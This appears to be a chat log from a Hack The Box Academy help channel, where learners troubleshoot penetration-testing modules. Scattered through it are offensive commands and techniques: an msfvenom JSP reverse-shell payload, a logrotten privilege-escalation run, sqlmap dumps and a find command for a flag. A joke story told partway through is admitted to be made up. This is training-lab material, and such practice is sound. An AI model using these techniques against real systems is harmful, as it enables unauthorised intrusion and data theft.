Tried it in Kali and on Windows and it just hangs. Fire up the pwnbox and the file pops up no problem same exact url
i just did it from my vm
Weird the next question I had no problem with
Went back and the only place /etc/passwd works is in the pwnbox. Oh well not going to waste anymore time worrying about problems on their side.
Thank you @wraith pelican for going in and checking for me!
Obtain remote code execution on the http://web01.inlanefreight.local:8180/ Tomcat instance. Find and submit the contents of tomcat_flag.txt
on https://academy.hackthebox.com/module/113/section/1211
I already got the RCE but i cant see the tomcat_flag.txt file,
They gave you the file name, you can use locate if it's installed or find. I don't have my notes for that section.
i did try that but its either no result or some java errors.
can you do me a favor and show me the command you're using to try and find the location of "tomcat_flag.txt" ?
hey, where can i share my feedback to a particular module ?
||find / -name tomcat_flag.txt 2>/dev/null|| i url encode this. locate command is not installed tho so i used find
not sure what you mean but when you finish a module you can submit a review
I was doing the Linux Fundamental module and in the Linux Structure Section particularly coming across this point: The top-level directory is the root filesystem and contains all of the files required to boot the operating system before other filesystems are mounted as well as the files required to boot the other filesystems. After boot, all of the other filesystems are mounted at standard mount points as subdirectories of the root. this point is kind of hard to understand as a beginner (i mean those sentence) and it will be so good if it is more clear. It's just my Feedback, Thank you.
ah are you using a web shell then? with the standard|| jsp_shell_reverse_tcp payload from msfvenom, it gives us access to a full shell||, so need to URL encode anything
that find command should find the flag very quickly 😉
but i do want to know how to manually find the flag after exploiting with .war
thanks!
right, basically have to use either find or locate. And locate only works if we are able to run sudo updatedb beforehand (typically)
yeah i hear you...that one is kinda funny... files filesystems other filesystems... mounted at mount points... pheww
yeah gottacha!
just think of the / in linux as the C: drive in Windows
yeah, true.
yep, I understood but just saying that the sentence could be much simpler to explain that. Thank you.
and i wouldn't worry too much about not fully grasp every new thing thrown at you. Things will progressively be clearer when you practice further. They just try to be precise in their explanation and concise at the same time
okay 👍
yes its perfectly normal and also intentional that students have additional questions as they are reading the material
Hi, does anyone know how to hyperlink a text in sysreptor?
have you checked the sysreptor docs? https://docs.sysreptor.com/designer/faqs/
do you guys have a go to guide for ligolo ? following the hackingarticles one, but wondering what else people are using
Been trying that in CWE field but still can't hyperlink the text
tbh ive only used sysreptor once or twice. But it looks like its just using standard markdown. Is this for a particular module you are working on?
I used a bit of multiple sources when googling. Just saved that one recently when you asked those pivoting questions https://medium.com/@issam.qsous/mastering-multi-pivot-strategies-unleashing-ligolo-ngs-power-double-triple-and-even-quadruple-dca6b24c404c
yeah quadruple, i knew it would speaks to you : D
Go here https://htb.sysreptor.com/htb/signup/ and register, they provide templates for the various htb certs. https://www.hackthebox.com/blog/certification-templates
and its free
okay i made a slight adjustment... just a comma added, but hopefully makes the message a bit more clear.
Greetings here. Am trying to start a simple web server with php but i am failing. So far i am using the command php -S <ip address>:<port number> but this has been marked wrong, also when i click the link to open the files where the web server is running i get a resource not found error.
Could this also be related to my apache2 failing to run when i start it?
Hi, for Exploiting Web Vulnerabilities in Thick-Client Applications, I am able to get fatty-server.jar but it does not open. Task manager shows that it is running but I am unable to interact with it. Can anyone help me with this?
Yeah I use that tools right now but can't markdown CWE's to CWE link
@everyone
Hello, anyone happen to be free to help troubleshoot a problem I am experiencing with my pc?
i promise that when i am going to finish this puzzle i mean this month i am going to return my debt 10x
If you don’t tell us your problem, no one can help
My computer has been running super slow on startup and browsing
ty

Is it windows?
Mac
Am not so familiar with mac OS but Try stopping all unnecessary services running in the system monitor, have you recently installed updates? whats your memory like
Hii anyone?
Can i dm someone regarding the web attacks - skills assesments?
nvm i got it
<@&861185840277487616>
need sanity check for question 1 in Special Permissions in linux priv section, i have tried all the files but none work, but i manage to solve 2nd question tho with the same result
nvm solved
Not today Elliot
why ??
Too busy working at Ecorp
hahahahaha
but i cant get into it , the loneliness just came back
anyways i have a problem in hackthebox , in the module " web requests " the machine in the first question isn't working , they just told me " target is spawning ..." then waiting till the end of the earth and i can't get the IP 😦
hard refresh and try it again?
i did all the solution in your mind , and it still not working
🤷♂️
thx btw
1st section: hypertext ? works here
just fgt it , the problem is unknown to solve this prob i may need to contact the support ( ik they will not respond till the hair grows in my nose )
works for me too
Any1 else have issues with spawning targets?
Yeah
Yup, targets aren't spawning
Well it is 4:00am, I suppose this is my sign to go to bed lol
Hello guys, Im having some problem with Login Form Attacks in the Login Brute Forcing Module, Im using rockyou.txt as it says but still couldnt find the password for login.php
LSA is not a process running like lsass.exe right? Is it just a specification which lsass implements?
I just booted up this module. Adapt their commands on the page to your own needs. I was just able to get the flag in a couple seconds
hmm ok i will give it a another shot
LSA is the system component that's responsible for local security policies, lsass is the process/service that carries out most of the tasks
System component in this context means LSA is part of the operating system right? So is it sort of like a specification which lsass must follow?
it does what's configured in the lsa
ah ok thanks!
https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication#BKMK_LSA
there is a part describing LSA
I know this is not exactly the right place but do you mind if i talk about why I quit my cybersecurity job, and i ran away from my roommate, im in a motel right now
I've lived with my roommate before that for about 6 months, he was also my colleague from a different department, he was mostly an okay guy but there was one weird thing about him
Did you create an account just to share your story😂
He kept telling me that there was a mermaid in the attic of the house and that he had "intercourse" with that mermaid every single day, i thought that was weird, but I laughed it off everytime he said it.
I mean, everyone is weird in their own way right? Its whatever?
So
Anyway,
the 6 months go by and my curiosity is really starting to kill me, so i decide to go up there to check the attic out for myself, So i wait for him to leave the house, and I proceed to actually go upstairs into the attic for the first time ever, you know what i found in there? A dead monkey with its legs stitched together
From there
I pack my bags and i get the fuck out of there asap
Still at the motel, i told him that i got fired and I'm going back to New York, i wanna pretend that i never saw a thing
Bruh
buh what
If i call the cops, he might come after me when they release him
bro said buh
I took pics of the monkey, it was a red howler breed
The pictures are extraordinarily disgusting, if you got the stomach for them ill share them
🤣
He kinda looked like a mermaid though to be fair
I’m at a loss for words
Alright, alright,enough
I made the story up

It was inspired by a joke from Frankie Boyle
Knew it🤣
Bye
and now we have to live with images of monkey in mermaids disguise... thanks for that
I'm working on Attacking Enterprise Networks: Web Enumeration and Exploitation and I'm having issues editing the cookie with cookie editor. I was able to grab the cookie value using the php server, but when editing it I'm receiving the error: "First-Party Isolation is enabled, but the required 'firstPartyDomain' attribute was not set.".
Bro what the actual fuck
i just completed the skills assessment for command injections. took me nearly forever to find the vulnerability in the first place. is this something that comes with experience/practice? or is there a method that makes this easier. i went through a few rabbit holes which i thought was vulnerable, before finally discovering the correct bug
I don't know if I'm in the right place, I'm trying to work on the "Practical Digital Forensics Scenario".
Unfortunately the RDP session is extremely lame and it takes several seconds after a click or keystroke 😦
~~
Like which server you using?
xx.197.207
I'm asking like what VPN server you using?
you can edit cookies using the browser
EU-academy-2
whats the ping?
try changing the VPN server.
in the file transfer module. I am trying to get practice copying files using scp. I have enabled ssh on the pwnbox. I'm using this command to copy a file named test.txt "scp htb-ac-546869@10.10.14.231:/home/htb-ac-546869/test.txt ." The connection keeps timing out? I've verified that ssh is enabled on the pwnbox. I was able to get transfers to work from the target machine back to my pwnbox but not the other way around. I'm assuming its a firewall rule? any suggestions?
i've even added a testuser and tried it that way, with no luck.
ok i got it, TCP doesn't work but UDP is fine thanks
Nice Nice.
check your ssh config?
Your ip/username doesn't look correct. the IP you're transferring to looks like the pwnbox or your vm. you're supposed to transfer to the target i believe, not the pwnbox
it was for practicing uploads so from target -> pwnbox
and you get connection refused, looks like ssh is disabled
does normal ssh work?
i guess it says timed out not refused
but still, i don't think you're meant to xfer like that. should be from pwnbox to target box
normal ssh does work
yeah this
i just figured it would work both ways. Thanks
and then it walks you through the steps of starting an ssh server on your pwnbox etc. But i couldnt get it to work.
it should
maybe outbound ssh connections are disabled for that target
Hello, anyone down for a little help on the Process Injection Section of the Evade Windows Defender Module ?
Ssh is already enabled on pwnbox
Windows Privilege Escalation module DNSAdmins section has me load a DLL file. However the DLL ends up crashing the DNS service upon restart, basically preventing the DLL from executing. Is there anything I can try?
Hi all! It is possible a hint for ntlm relay attack skills assessment question 3!! I own Backup01, but then I am stuck, the creds of ||sql_ftp_test|| doesn't give me any special access on ||shares || and ||with the host I've created|| I can read in some shares but no clue what to do. Thank you!!
check all the accounts you have control over for what shares you can access
Could I dm you to avoid flooding the chat with more questions?
So I have made some progress doing the Windows Event Logs & Finding Evil module - I just done the reflective DLL, the windows lab is incredibly slow and it nearly booted me out, is there anyway I can get the files and spin up my own VM to do the rest? I am assuming not but thought I would ask the question
I thought the hint is pretty self explanatory
check the shares of the sql machine using all the accounts you have
Yeah I have done both, no dramas... I'll just plod along it isn't a race
thank you! I was more focus on finding ||write permissions||
I'm working on the Command Execution Skills assessment and just need some guidance. Does anyone have some time to DM about it?
I just need a sanity check to verify that I'm on the right track.
for module Linux Priv Esc, Logrotate section
i have used this script but nothing works
||./logrotten -p payload backups/access.log||
anyone can guide me?
I'd check to make sure your payload isn't conflicting with how the logs are created
Also can I apologise for the other day asking stupid questions, I hadn't moved what I needed, to a user writable area as told in the actual course material, main issue was that... layer 8 issue, Sorry 😂
for the command execution skills assessment, I need to move the flag to the tmp directory, correct?
yes
@old oasis thanks. I think I've found the vulnerability, I'm just having trouble fuzzing it out.
@old oasis Mind if I DM you real quick about it?
thank!
hi I'm getting this weird error when I try to crawl inlanefreight.com on htb academy's creepy crawlies section of information gathering web edition module
└──╼ $python3 ReconSpider.py http://inlanefreight.com
Traceback (most recent call last):
File "/home/htb-ac-605555/ReconSpider.py", line 6, in <module>
from scrapy.downloadermiddlewares.offsite import OffsiteMiddleware
ModuleNotFoundError: No module named 'scrapy.downloadermiddlewares.offsite'
Try installing Scrapy in a virtual environment with Pip
I did that won't work either
┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $pip3 install scrapy
error: externally-managed-environment
× This environment is externally managed
╰─> To install Python packages system-wide, try apt install
python3-xyz, where xyz is the package you are trying to
install.
If you wish to install a non-Debian-packaged Python package,
create a virtual environment using python3 -m venv path/to/venv.
Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
sure you have python3-full installed.
If you wish to install a non-Debian packaged Python application,
it may be easiest to use pipx install xyz, which will manage a
virtual environment for you. Make sure you have pipx installed.
See /usr/share/doc/python3.11/README.venv for more information.
note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
hint: See PEP 668 for the detailed specification.
[notice] A new release of pip is available: 24.0 -> 24.1.1
[notice] To update, run: python -m pip install --upgrade pip
and then this won't work either:
└──╼ $python -m pip install --uprade pip
Usage:
/usr/bin/python -m pip install [options] <requirement specifier> [package-index-options] ...
/usr/bin/python -m pip install [options] -r <requirements file> [package-index-options] ...
/usr/bin/python -m pip install [options] [-e] <vcs project url> ...
/usr/bin/python -m pip install [options] [-e] <local project path> ...
/usr/bin/python -m pip install [options] <archive url/path> ...
no such option: --uprade
hold on misspelled upgrade
nope still won't work
you're not in a virtual environment
run this
┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $python -m pip install scrapy --break-system-packages
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: scrapy in /usr/lib/python3/dist-packages (2.8.0)
Funny enough @heavy mango helped with this previously
@fathom pendant ok this answers my question because what @next bronze suggested didn't work
I actually realized that both ways work. Either replacing the line in the script or running the whole thing in a virtual environment
Likely a weird thing with python 3.11 and 3.12
ok got it
you're not even in a venv
of course it won't work
when I tried to start a venv it didn't work
it worked when I tested it in pwnbox
ok let me try again
what's your solution
modifying the script?
Yeah
┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $python3 -m venv /home/htb-ac-605555/
┌─[htb-ac-605555@htb-h8nxsns0b4]─[~]
this doesn't work it literally does nothing
dude
That's what I tried first, but then I saw someone running it in a venv which also worked
if you can't even copy and paste I can't help you
That doesn't look like what xreous sent
I did copy and paste
ok let me reread Xreous comment
ah ok
seems like pwnbox update broke some stuff
Nah 6.1 didn't break anything for me
Maybe Python then like you said
just python things
have you managed to make it work?
wait got it activated now trying again
I got virtual environment activated and it did nothing
(venv) ┌─[✗]─[htb-ac-605555@htb-h8nxsns0b4]─[~]
└──╼ $sudo pip install scrapy
error: externally-managed-environment
× This environment is <SNIP>
why the hell if you use the same command on pwnthebox it works while from your own virtual machine it does not?
maybe because it is installed correctly on the pwnbox
no man. inlanefreight.com is opened on the internet. I use the same command, same wordlist (verified the size and hash) and it misses some findings on my vm
Is there an additional step that I have to take to route my curl traffic through burpsuite using proxychains?
Or a setting/feature that I have enabled or disabled that would cause curl requests going through proxychains to respond with 'couldn't connect to server'? When I curl to the same ip normally, it goes through, but when using proxychains it doesn't. https://academy.hackthebox.com/module/110/section/1053
I think some filtering due to massive traffic is applied but that just makes it confusing, especially if the question requires to bruteforce
works on mine
can i dm you?
no
works in a fresh install, just add the line into the config file and run burp
Yea it worked on the pwnbox should i make a new vm
ill do that
nvm figured that out. It now works on my vm too
good! what was the issue?
I'm not supposed to tell you that 🙂
: D fair enough
joking. I'll share that for whoever is reading: make sure to use public dns servers. dnsenum was querying my local isp dns. Also works with gobuster
Hi. Is it normal that Pwnbox lacks CrackMapExec?
use netexec instead
Ok. Thanks man!
ok it works now tysm 🥰 🀄
Further Credential Theft in windows priv esc
it is a section that exists in that module
Further Credential Theft in windows priv esc. i am supposed to add vhost in rdp?
the IP address should work just fine
Anyone know of any modules that might go over scanning external hard drives or USBs for potential threats? Or anywhere I could get some information on best practices?
In the antak portion of the shells and payloads module I was able to get a webshell but I'm unable to interact with it has anyone else ran into a similar issue?
Hi guys im doing a module and its says that i need to use CVE-2021-1675 - PrintNightmare LPE and im wondering how can i enumerate the system manually to discover that is this vulnerability that i need to exploit. Thanks for the help
wdym? if you can load the webshell you can interact with it
Like the webshell pulled up I just cant type anything
make sure your copy is working and upload again
I've uploaded 3 times now changed the credentials and all that like the module said, but for some reason can't type on the shell?
haven't seen that before, use a different browser maybe
I'll try that
I must have missed something because I can't get this to work. Could it be because I had to git clone antak since it wasn't in my usr/share directory?
Shouldn't be, that code hasn't been updated in 9 years. You try on pwnbox?
No I was using my kali machine but I can try on pwnbox
That's at least an easy sanity check
wait are you clicking in the right place
the input box is separate from the output
I only see one box that I can't type out of is there a separate box that is supposed to pop up?
input is at the bottom box
This is what I see when I get my shell? I'm confused
I don't have anywhere to type?
Oh shit I clicked everywhere but there I guess appreciate the help
for the last question of last section of information gathering web edition, its asking me which API key the inlanefreight developers will be chacking to
I did ReconSpider and I see a telnet password
ok
Subdomain of subdomain
ok so like dirbuster?
Sort of
ok
You need to spider the x.y.inlanefreight.htb
So you need to find the right vhosts
just finished it. In the last step you are supposed to use a crawler even if in the modules there's no explanation on how to use scrapy
for some reason burpsuite won't crawl beyond 12-13 depth so you have to write your scrapy crawler
? The ReconSpider tool that was written up was explained in the module
I wasn't able to make it use the hostname defined in /etc/hosts...
http://hostname:port
You still need to tell it what port to use, you don't define the port in /etc/hosts
yeah, my fault. The target changed the port number when time finished and I was still using the old port number and forgot to switch it in the url passed to reconspider tool :S
I wrote my own scrapy script, modified the hostname and parsed the output lol. Well at least I learned something new 🙂
Hi
Hello
what's the current bloodhound version? on Github it says v4.3.0, however having problem with sharpHound which is version 2.3.0 (stuck upload of .json), which indicates that it's compatible only with BH 5. Kali repo only has 4.3.1.... Could someone shed some light on it?
BH CE (5.x) is the latest
however that's built for docker containers
I just went to one of the targets from ad enum and downloaded that one
2.3 afaik isn't compatible with < 5
c:\temp>sharphound.exe --version
sharphound.exe --version
2024-07-02T16:37:42.5164164-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
SharpHound 2.3.0
oh sorry yes, you're correct
I want to start learning Cyber Security quickly
you've come to the right place
Will I learn quickly?
learning cybersecurity is a marathon not a sprint 🙂 patience is key.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
That’s entirely dependent on you and how much work you put in.
So where to start learning useful things in Cyber Security from a beginner level
?
take a look at the link two messages above for a guide on how to start
well the HTB academy has the Information Security Foundations skill path which goes through the bare bones basics of things you may run into in the security field, which is vast
Just to add to what @fathom pendant said: I think it's better than portswigger academy
Granted: you only get half the course for free but I feel like I got a lot more understanding out of it than I did with Portswigger Academy.
How long does it take to learn Cybersecurity?
sort of depends on your determination, time, etc..
idk if this is intended
Sorry for the late reply but how to check how the log are created
cat the log?
but case10 on sql map i just did sqlmap -r case10 -T flag10 --dump
and got the flag lmao
didnt have to do anything else
i can provide the flag and SS for validation to those who have completed
What username allows you to log in to the target system via telnet with a blank password?
?
root?
What is it about? SUBMIT FLAG
Submit root flag
?
@swift carbon
?
are you doing a box? what is the context of your question?
Yes
What does send the flag mean
What should I do?
usually there is a place on the hackthebox platform to submit flags for the boxes you are working on. should be on the box's page within the htb platform
And what flag should I send??
that depends on the box lol
It's right below where you started the target box.
this channel is intended for HTB Academy so this conversation technically off topic now
Trying to install smbclient. It didnt work and said that it needed samba-commons and samba-libs installed, did this and the install is still not working
Is there anyone I can DM re "LOLBAS: RunDll32" from the Evasion techniques module? I've compiled the dll as instructed but it won't trigger a shell. I can see in the final code snippet (albeit it's cut off in the screenshot) that there's further modifications to the code that don't appear in the module?
I thought so but i guess not on parrotsec
make sure you do a sudo apt update && sudo apt upgrade before installing to make sure the repos are up-to-date
you can also try adding -t lory-backport
to sudo apt install smbclient?
it worked
home? Security?
security
noted
Thanks again
I think they just updated it because i dont remember it being debian before
parrot has always been a debian derivative
they didn't
that icon is based on what you select when you install it in virtualbox
did you check the kernel used?
on which
i havent i can right now though. That's uname -r or v right
i'm talking at a different level to uname
i'm talking about through just looking at the virtualbox settings
aha
yeah that's why the icon is different
ok i see
my dad helped me set it up the first time and i was kind of clueless
thank again 🫡
hi how long does the box for lab take to spawn?
for me, it usually takes up to 30 seconds
Hi, anyone happen to be online who's good at troubleshooting computer issues? Dm me if you're free to help. Thank you!
||192.168.0.104 - - [29/Jun/2019:14:39:55 +0000] "GET /robbie03 HTTP/1.1" 404 446 "-" "curl"||, is there a specific payload for http log, i cant find it online tho, using chatgpt answer but not working too
This isn’t a helpdesk for computers
Well... the log uses double quotes
now i know why... HAHAHAHA thanks
yo guys when enumerating smtp which wordlist shud i use for usernames?
does anyone have thread list for hydra for diff services?
it's a very important skill in pentesting to be able to look things up with google
im still not able to get shell in logrotation section
just keep spamming the payload and triggering logrotate super fast until u get a shell
thats what worked for me
got 12 log already still spamming 😭
keep it simple if you can't get a shell
ive tried 'touch hehe.txt' also wont work
lol that name
module:-SQLMAP ESSENTIALS & Section:-Advanced Database Enumeration i used this command to dump data base:-sqlmap -u 'http://"ip"/case1.php?id=1' --dump -D testdb -T users
even got password it's showing wrong
it should be E...9
i am getting password something like:- starts with "d642" and ends with "eba0"
let me check
so this is the name right there "Kimberly Wright" am i right?
yes there's only one kimberly
i think i need to start again let me try once more
wait you know that's a hash right?
yes
did you crack it
is it possible to DM you it will take 1 min
i did
this is the hash, not the password
so hash is right?
no
^^
lol
buddy, crack the hash and you get the password, that's it
hi. i'm doing the file uploads attack module, and there's mention of using burp to fuzz the extensions. i'm not getting this set of payloads. is this some extra feature with burp pro? i'm using community edition
hello, did you check the wordlists linked in the course material?
yes, i just realized, the course material mentioned a different wordlist 🫣
i was using the seclist one
choosing the correct wordlist is an art sometimes 😅
Hi, I'm currently hardstuck on "Exploiting Web Vulnerabilities in Thick-Client Applications".
I've removed the 1.RSA and 1.SF files and modified .\META-INF\MANIFEST.MF removing all hashes. I also double-checked that MANIFEST.MF ends with a newline. Then I ran jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar * but still shows me the "Connection Error!" modal. Any help would be appreciated.
Nevermind, I found a forum post on HTB Forums that explains it.
WINDOWS PRIVILEGE ESCALATION - SeImpersonate and SeAssignPrimaryToken
I’m trying to login mssqlclient, I got this error:
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'no protocols available')]
Attack the Splunk target and gain remote code execution. Submit the contents of the flag.txt file in the c:\loot directory. ( can someone help me with this question from ATTACKING COMMON APPLICATION) i did exactly told in the module but i'm not getting reverse shell.
hello to everybody. I need some minor help in the Web Attack module under the IDOR's section. I am curling the target to be able to get the response back but the response i am getting in curl is different from the 'view page source' results. In Curl I get only half of the HTML that is in the source of the page. Do you know why this is happening. I can provide the example here in a picture.
The blue lines do not come up in curl
Hi everyone,
I'm working on the "LOGIN BRUTE FORCING" section, specifically on page 9, "Service Authentication Brute Forcing." I've been trying to brute force the SSH login for user "b.gates" on the target server using several wordlists, including ssh-betterdefaultpasslist.txt, default-passwords.txt, and rockyou-50.txt. Despite trying these wordlists, I haven't been able to find the correct password for the first task.
Can anyone suggest a wordlist that worked for them or provide guidance on how to approach this problem effectively?
Thanks in advance!
Did you create from the previous step the personalised username name list?
According to the task instructions, the username is specified as "b.gates."
Indeed but this was found because we created that custom username list and create a custom password list in the previous sections
these two lists should be used I think. I am no expert i am just trying to remember what I did also through my notes
Your advice to make a custom password list totally worked. Got in! Thx.
Amazing 😄
What is the API key in the hidden admin directory that you have discovered on the target system?
how to do this? in recent information gathering web edition skills assessment
Check or re-check the skills assessment briefing, you'll find clues in there, maybe ways you didn't explore yet.
do i have to do directory bruteforcing
re-read the brief, it's not even just clues, it is literally what you have to do to get the answers
in the section it's shown how to set the bypass policy
Is anyone getting "VMs failed to spawn. If this persists please contact support."
What is the API key in the hidden admin directory that you have discovered on the target system?
how to do this? in recent information gathering web edition skills assessment
what should i do on this to solve this?
i have tried to enumerate directory by directory bruteforcing but still cant get anything
help me with this
DM!
check ur dm
Why cant i use the "general" channel?
Not actually a part of the modules but I thought this was as good a place as any, but now Bloodhound Gui breaks my VM
This is after it is closed
I have uninstalled and reinstalled, rebooted multiple times. Opened it through the console and through the apps in the top left. Im assuming its not universally broken
time to use the community edition 
bro the new UI is kinda of weird
I guess so lmao
bro really crying
I just realized u can hear House M.D playing lmaoo
after using it for a bit I think I like it more tbh, I use CE exclusively now
wondering , how many vulns will be found on this https://learn.microsoft.com/en-us/windows-server/get-started/whats-new-windows-server-2025
I actually decided to watch the show after seeing so many reels
Anyone have any tips how to fix the resolution / hz in the VMware
anyone having issues spawning a machine
Hi, I've RDP'd into a windows machine and I'm trying to upload a file from my host, to that windows machine. I want to use the FTP method
- I made an FTP server with a user "user" and password "pass" using pyftpdlib
- I then tried to access via cmd prompt on the remote host using
ftp user@10.10.15.189
The error I always get is unknown host user@10.10.15.189
I tested pinging the machine from the RDP and it responds. Should also be noted i tried making that server on my localhost "10.0.2.15", but the RDP can't ping it
using ftp in windows is not that easy
I recommend using smb or web
The settings are under vm --> settings --> display
ftp <ip>, supply username when it asks
i did that as well, same error
refer to the file transfer module
im doing that module rn
i figured SMB would be harder, ill try that then, just wanted to use FTP
no smb is easier
smb is easier yeah
alright thanks
if you have rdp that's way more easier
Was my thinking correct when I used the tun0 ip and not my eth0?
yeah that's what you're supposed to do
cold, thanks
Thanks for responding. I have tried editing the cookie via the browser, but there is no change. The login link does not log me in as any account.
are you sure , that's the right form , the { } don't look good to me
I tried both with and without the brackets
you're putting the cookie into name?
Yes, and value of || fcfaf93ab169bc943b92109f0a845d99 ||
the value should be in the value box, name is different
got it!
Thanks @sacred gull @limber river @next bronze . I love the support
it doesnt have support for bloodhound-python which is quite sad.
that's bad
compatible
I remember using nxc ingestor with it